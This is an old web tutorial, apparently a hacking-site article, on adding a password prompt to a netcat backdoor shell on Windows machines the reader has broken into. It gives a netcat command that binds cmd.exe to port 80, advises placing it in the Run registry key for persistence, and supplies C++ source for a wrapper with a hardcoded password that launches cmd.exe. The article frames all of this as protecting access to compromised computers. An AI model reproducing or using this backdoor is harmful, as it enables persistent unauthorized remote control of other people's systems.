|
Protecting your netcat shells |
|
|
|
Well first I'll state that to make proper use of this article you should at least have to know how to use netcat and transferring files to computers you have got into as there are various articles you can find on the net allready.
nc -l -d -p 80 -e cmd.exe -L
That is pretty much the command that you will do if you plan on shovelling a shell with netcat. But by doing so this will give shell access to anyone that telnets into that port. Why should you let anyone reap the rewards of your hard work? Well if you use this basic application you won't have to.
The code is pretty much straight forward and easy to understand. What this program will do is ask for a password before it will open up command prompt on a system. To use this you will have to transfer this program to the system and instead of using the above command you would use something like "nc -l -d -p 80 -e shell.exe -L" without the quotes obviously. Also you should add that command into the run registry.
I've tested this program on Windows XP and it worked flawlessly however you must have both netcat and this program in the same directory and you must also have to have it along with netcat and the same directory for it to work properly.
NOTE: Make sure to change the damn password! ----------------------------------------------------------------------- /* Netcat password protected shell program this is used in conjunction with netc
at to enable you to have a semi-secure shell on a Windows machine. Code is very
basic and may need to be changed a bit if your not using Windows XP.
Any problems contact me on
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
Comments are provided for the code illeterate.
* note that this program IS susceptible to buffer
overflow exploits and should not be used without
modification. This is merely code to demonstrate
how netcat can be used.*..
Trung Luu
*/
#include <stdlib.h>
#include <string.h>
#include "iostream.h"
void welcome() { // Just a basic welcome screen...
cout<<" +------------------------------------------------+n";
cout<<" | Password Protected Shell |n";
cout<<" | Created by Trung Luu |n";
cout<<" +------------------------------------------------+n";
}
void pwshell() {
char password[10]; // I still use the old-style strings
char input[10];
strcpy(password, "letmein"); // declares the password. make sure to
change!!
cout << "Please input the correct password for the shell...n";
cin.getline(input, sizeof(input)); // Asks for the user to input the pass
/* bug here when your exiting shell that the text is re-displayed
will fix when I got time as it is just a minor bug */
if (strcmp(password, input) == 0) { // compares the two values
cout << "password is correctn";
cout << "shell executingn";
system("cmd.exe"); // will only be reached if password is correc
t
}
else {
cout << "password is incorrectnExiting...n"; // if wrong it wo
n't let ya in
}
}
// starts the two functions
int main()
{
welcome();
pwshell();
return 0;
}
Related Items:
|
